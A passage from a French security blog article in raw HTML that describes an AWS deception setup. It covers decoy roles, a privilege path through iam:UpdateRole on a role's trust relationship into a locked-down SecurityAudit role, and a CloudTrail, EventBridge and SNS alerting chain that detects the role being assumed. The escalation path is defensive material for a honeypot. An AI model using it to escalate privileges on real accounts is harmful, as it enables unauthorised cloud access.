<li data-leveltext="o" data-font="Courier New" data-listid="38" data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559683&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}" aria-setsize="-1" data-aria-posinset="1" data-aria-level="2"><span data-contrast="none">Des Users : différents noms d’utilisateurs attrayants pour l’attaquant. </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:1094,&quot;335559739&quot;:96,&quot;335559740&quot;:259,&quot;335559746&quot;:40}"> </span></li>
<li data-leveltext="o" data-font="Courier New" data-listid="38" data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559683&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}" aria-setsize="-1" data-aria-posinset="2" data-aria-level="2"><span data-contrast="none">Le rôle « LambdaFunction » : ce rôle est créé pour la simulation d’une fonction Lambda qui fait appel aux services AWS.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:1094,&quot;335559739&quot;:96,&quot;335559740&quot;:259,&quot;335559746&quot;:40}"> </span></li>
<li data-leveltext="o" data-font="Courier New" data-listid="38" data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559683&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}" aria-setsize="-1" data-aria-posinset="3" data-aria-level="2"><span data-contrast="none">Le rôle « LogsAndS3Bucket » : un rôle créé avec objectif de faciliter l&rsquo;accès aux services de journalisation et aux ressources de stockage S3 au sein du compte.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:1094,&quot;335559739&quot;:96,&quot;335559740&quot;:259,&quot;335559746&quot;:40}"> </span></li>
<li data-leveltext="o" data-font="Courier New" data-listid="38" data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559683&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}" aria-setsize="-1" data-aria-posinset="4" data-aria-level="2"><span data-contrast="none">Le rôles « taskExecutionRole » : le rôle d’exécution des tâches pouvant être utilisé pour différents objectifs et services associés au compte.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:1094,&quot;335559739&quot;:96,&quot;335559740&quot;:259,&quot;335559746&quot;:40}"> </span></li>
</ul>
<p><span data-contrast="none">3. Le rôle « SemiAdminRole » a volontairement été configuré avec la permission (iam :UpdateRole) sur le rôle « LambdaAuto » lui permettant de modifier ce rôle et donc d’ajouter la relation d’approbation vers le rôle « SemiAdminRole ». Pour des raisons de surveillance, une première alerte peut être déclenchée à ce niveau lors de la mise à jour de la relation d’approbation de « LambdaAuto » permettant au « SemiAdminRole » de l’assumer.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="none">4. Le rôle « LambdaAuto » est créé volontairement comme la porte d’entrée vers le rôle « SecurityAudit », une fois sa relation d’approbation modifiée grâce aux privilèges du rôle « SeminAdminRole ».</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="none">5. Le rôle « SecurityAudit » est volontairement configuré avec une relation d’approbation autorisant le rôle « LambdaAuto » du compte SHARED à l’assumer.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="none">6. A cette étape, l&rsquo;attaquant avait supposé qu&rsquo;il obtiendrait des droits d&rsquo;auditeur de sécurité. Cependant, une politique de contrôle de sécurité (SCP) très restrictive a été appliquée, ne lui accordant aucun privilège sur le compte.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:207,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> <img loading="lazy" decoding="async" class="aligncenter wp-image-22473 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/11.jpg" alt="" width="1031" height="539" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/11.jpg 1031w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/11-365x191.jpg 365w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/11-71x37.jpg 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/11-768x402.jpg 768w" sizes="auto, (max-width: 1031px) 100vw, 1031px" /></span></p>
<p style="text-align: center;"><i><span data-contrast="none">La politique interdisant toutes actions depuis le rôle Security-Audit-Role</span></i><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:-304,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:284}"> </span></p>
<p> </p>
<h2 style="text-align: justify;" aria-level="1"><span data-contrast="none">Chaîne d’alerting</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:567,&quot;335559738&quot;:240,&quot;335559739&quot;:360,&quot;335559740&quot;:259,&quot;335559991&quot;:567}"> </span></h2>
<p style="text-align: justify;"><span data-contrast="none">Une chaîne d&rsquo;alerting dans le cloud AWS fait référence à un moyen de communiquer des notifications ou des alertes générées par les services AWS aux utilisateurs ou aux équipes responsables de la gestion de ces services, leur permettant de prendre des mesures rapides pour résoudre les problèmes et minimiser les interruptions de service. </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559731&quot;:284,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Pour configurer une chaîne d’alerting, vous devez d&rsquo;abord configurer les services AWS pour générer des alertes lorsque certains événements se produisent, comme un serveur en panne ou une application dépassant un seuil spécifique d&rsquo;utilisation du processeur. Une fois ces alertes générées, elles peuvent être envoyées à la chaîne d’alerting appropriée en fonction des préférences de notification configurées par l&rsquo;utilisateur ou l&rsquo;équipe responsable de la gestion du service.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Afin de détecter l’attaquant, nous utilisons les services AWS suivants pour créer la chaine d’alerting :</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:1135,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:284}"> </span></p>
<ul style="text-align: justify;">
<li data-leveltext="" data-font="Symbol" data-listid="46" data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559683&quot;:0,&quot;335559684&quot;:-2,&quot;335559685&quot;:644,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><a href="bookmark://_CloudTrail"><b><span data-contrast="none">CloudTrail</span></b></a><span data-contrast="none"> pour traquer les actions réalisées sur le compte AWS compromis ;</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="46" data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559683&quot;:0,&quot;335559684&quot;:-2,&quot;335559685&quot;:644,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><b><span data-contrast="none">EventBridge</span></b><span data-contrast="none"> pour détecter tout événement « AssumeRole » du rôle « SecurityAudit » et déclencher une alerte ;</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="46" data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559683&quot;:0,&quot;335559684&quot;:-2,&quot;335559685&quot;:644,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><a href="bookmark://_SNS_-_Simple"><span data-contrast="none">Simple Notification Service (SNS</span></a><span data-contrast="none">)</span><span data-contrast="none"> pour envoyer l’alerte par e-mail avec les informations recueillies lors de l’attaque.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></li>
</ul>
<p style="text-align: justify;"><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:567,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:567,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> <img loading="lazy" decoding="async" class="aligncenter wp-image-22475 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/12.jpg" alt="" width="1255" height="629" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/12.jpg 1255w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/12-381x191.jpg 381w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/12-71x36.jpg 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/12-768x385.jpg 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/12-800x400.jpg 800w" sizes="auto, (max-width: 1255px) 100vw, 1255px" /></span></p>
<p style="text-align: center;"><i><span data-contrast="none">Illustration de la chaîne d’alerting</span></i><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:567,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<h3 style="text-align: justify;" aria-level="2"><span data-contrast="none">Etapes de création de la chaîne d’alerting :</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:1418,&quot;335559738&quot;:240,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:851}"> </span></h3>
<h4 style="text-align: justify;" aria-level="3"><span data-contrast="none">Configuration de CloudTrail</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:1418,&quot;335559738&quot;:240,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:851}"> </span></h4>
<p style="text-align: justify;"><span data-contrast="none">La première étape de la création d&rsquo;une chaîne d’alerting sur AWS consiste à activer CloudTrail (s’il n’est pas activé) dans votre compte AWS. CloudTrail enregistre toutes les activités et calls API dans votre compte, ce qui peut être utile à des fins de sécurité, de conformité et de dépannage. </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Partant des logs générés dans CloudTrail, nous avons créé une règle EventBridge qui envoie des notifications au service SNS chaque fois que le rôle « SecurityAudit » est assumé (type d’événement : AssumeRole).</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<h4 style="text-align: justify;" aria-level="3"><span data-contrast="none">Création d’une règle EventBridge</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:1418,&quot;335559738&quot;:240,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:851}"> </span></h4>
<p style="text-align: justify;"><span data-contrast="none">Une règle permet de surveiller des types d’événements spécifiques et lorsqu’un événement correspondant se produit, il est routé vers le service associé à la règle et traitant l’événement (ici le service SNS).</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:144,&quot;335559740&quot;:259,&quot;335559746&quot;:60}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Le modèle d’événement permet de détecter tous les événements du type « AssumeRole » se produisant dans le compte utilisé et déclencher l’alerte. Afin d’éviter les faux positifs lors du déclenchement des alertes, nous avons affinés le modèle d&rsquo;événement pour qu&rsquo;il soit aussi précis que possible pour correspondre aux événements qui nous intéressent. </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:144,&quot;335559740&quot;:259,&quot;335559746&quot;:60}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">De ce fait, il sied d’inclure des champs pertinents, tels que la source de l&rsquo;événement, le type de détail ou des valeurs spécifiques, pour affiner les critères de correspondance. Cela permet de réduire les risques que des événements non liés déclenchent la règle.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:144,&quot;335559740&quot;:259,&quot;335559746&quot;:60}"> </span></p>
<p style="text-align: justify;"> <br /><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:259}"> <img loading="lazy" decoding="async" class="aligncenter wp-image-22477 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/13.jpg" alt="" width="1013" height="448" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/13.jpg 1013w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/13-432x191.jpg 432w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/13-71x31.jpg 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/13-768x340.jpg 768w" sizes="auto, (max-width: 1013px) 100vw, 1013px" /></span></p>
<p style="text-align: center;"><i><span data-contrast="none">Le modèle d’événement détectant tous les événements « AssumeRole » sur le rôle « SecurityAudit »</span></i><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:1135,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:284}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Le service Eventbridge doit donc être préalablement lié à la cible SNS. </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"> <br /><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> <img loading="lazy" decoding="async" class="aligncenter wp-image-22479 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/14.jpg" alt="" width="1157" height="154" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/14.jpg 1157w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/14-437x58.jpg 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/14-71x9.jpg 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/14-768x102.jpg 768w" sizes="auto, (max-width: 1157px) 100vw, 1157px" /></span></p>
<p style="text-align: center;"><i><span data-contrast="none">La cible liée à la règle EventBridge</span></i><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:1135,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:284}"> </span></p>
<h4 style="text-align: justify;" aria-level="3"><span data-contrast="none">Configuration d’une rubrique SNS</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:1418,&quot;335559738&quot;:240,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:851}"> </span></h4>
<p style="text-align: justify;"><span data-contrast="none">A cette étape, une rubrique SNS est créée et liée à un abonnement d’un point de terminaison par mail authentifié par la suite. Le sujet SNS sera la cible de la règle EventBridge. Après la création du sujet, on procède à l&rsquo;abonnement par e-mail en sélectionnant l’adresse de messagerie comme protocole (point de terminaison) où on souhaite recevoir les alertes.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><i><span data-contrast="none">On pourrait envisager d’autres cible que mail pour la réception de l’alerte (ServiceNow, SIEM, etc…).</span></i><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:259}"> </span> <br /><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:259}"> <img loading="lazy" decoding="async" class="aligncenter wp-image-22481 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/15.jpg" alt="" width="883" height="339" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/15.jpg 883w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/15-437x168.jpg 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/15-71x27.jpg 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/15-768x295.jpg 768w" sizes="auto, (max-width: 883px) 100vw, 883px" /></span></p>
<p style="text-align: center;"><i><span data-contrast="none">Détails de la rubrique SNS</span></i><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:1135,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:284}"> </span></p>
<p style="text-align: justify;"><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:491,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:284}"> </span></p>
<h4 style="text-align: justify;" aria-level="3"><span data-contrast="none">Personnalisation de l’alerte</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:1418,&quot;335559738&quot;:240,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:851}"> </span></h4>
<p style="text-align: justify;"><span data-contrast="none">Afin de personnaliser le contenu de l’alerte et de n’afficher que les éléments importants recherchés, la fonction Transformateur d&rsquo;entrée d&rsquo;EventBridge a été utilisée. </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Elle permet de personnaliser le texte d&rsquo;un événement avant qu&rsquo;il ne soit transmis à la cible.  Pour ce faire, il sied de définir des variables JSON pour référencer des valeurs dans la source d&rsquo;événement d&rsquo;origine.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;" aria-level="4"><b><span data-contrast="none">Configuration du transformateur d’entrées</span></b><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Pour notre cas, les variables répertoriées ci-dessous constitueront le message de l’alerte :</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> <img loading="lazy" decoding="async" class="aligncenter wp-image-22483 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/16.jpg" alt="" width="992" height="529" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/16.jpg 992w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/16-358x191.jpg 358w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/16-71x39.jpg 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/16-768x410.jpg 768w" sizes="auto, (max-width: 992px) 100vw, 992px" /></span></p>
<p style="text-align: center;"><i><span data-contrast="none">Création du transformateur d’entrée</span></i><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:568,&quot;335559731&quot;:284,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:284,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;" aria-level="4"><b><span data-contrast="none">Modèle d’entrée</span></b><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Le modèle d&rsquo;entrée va utiliser les variables définies précédemment au sein du message d’alerte final : </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: center;"><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> <img loading="lazy" decoding="async" class="aligncenter wp-image-22485 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/17.jpg" alt="" width="1275" height="245" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/17.jpg 1275w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/17-437x84.jpg 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/17-71x14.jpg 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/17-768x148.jpg 768w" sizes="auto, (max-width: 1275px) 100vw, 1275px" /></span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span><i><span data-contrast="none">Création du modèle d’entrée</span></i><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:568,&quot;335559731&quot;:284,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:568,&quot;335559731&quot;:284,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Ainsi, après endossement du rôle « SecurityAudit », une alerte est envoyée au point de terminaison créé :</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:284,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:284}"> </span></p>
<p style="text-align: justify;"> <br /><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> <img loading="lazy" decoding="async" class="aligncenter wp-image-22487 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/18.jpg" alt="" width="1267" height="431" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/18.jpg 1267w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/18-437x149.jpg 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/18-71x24.jpg 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/18-768x261.jpg 768w" sizes="auto, (max-width: 1267px) 100vw, 1267px" /></span></p>
<p style="text-align: center;"><i><span data-contrast="none">Exemple du contenu de l’alerte par mail</span></i><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:284,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:284,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<h3 style="text-align: justify;"><b><span data-contrast="none">Coût des services AWS utilisés</span></b><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></h3>
